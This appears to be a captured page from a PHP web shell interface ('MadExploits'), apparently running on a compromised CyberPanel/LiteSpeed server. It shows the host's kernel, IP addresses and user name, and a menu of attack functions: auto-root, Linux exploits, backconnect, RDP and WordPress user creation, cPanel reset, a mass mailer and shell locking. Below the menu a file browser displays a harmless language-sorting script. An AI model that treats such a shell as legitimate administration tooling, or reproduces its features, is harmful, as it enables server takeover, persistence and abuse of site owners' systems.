Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
res /
lang /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US_msg.php
38.16
KB
-rw-r--r--
en-US_tips.php
199.65
KB
-rw-r--r--
ja-JP_msg.php
44.3
KB
-rwxr-xr-x
ja-JP_tips.php
256.51
KB
-rw-r--r--
util_sortlang.php
489
B
-rw-r--r--
zh-CN_msg.php
36.99
KB
-rw-r--r--
zh-CN_tips.php
185.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util_sortlang.php
<?php if ($argc == 1) { echo "Usage: $argv[0] lang [mixed] lang is the language file you want to sort. Current supported values 'english', 'chinese', 'japanes' If supply 2nd param mixed, the translated file will mix all the tags in the sorted order. Otherwise, the new tags will show up in the end\n\n"; return; } include(__DIR__ . '/../../lib/DMsg.php'); $option = ''; if (isset($argv[2])) { $option = $argv[2]; } DMsg::Util_SortMsg($argv[1], $option);
Close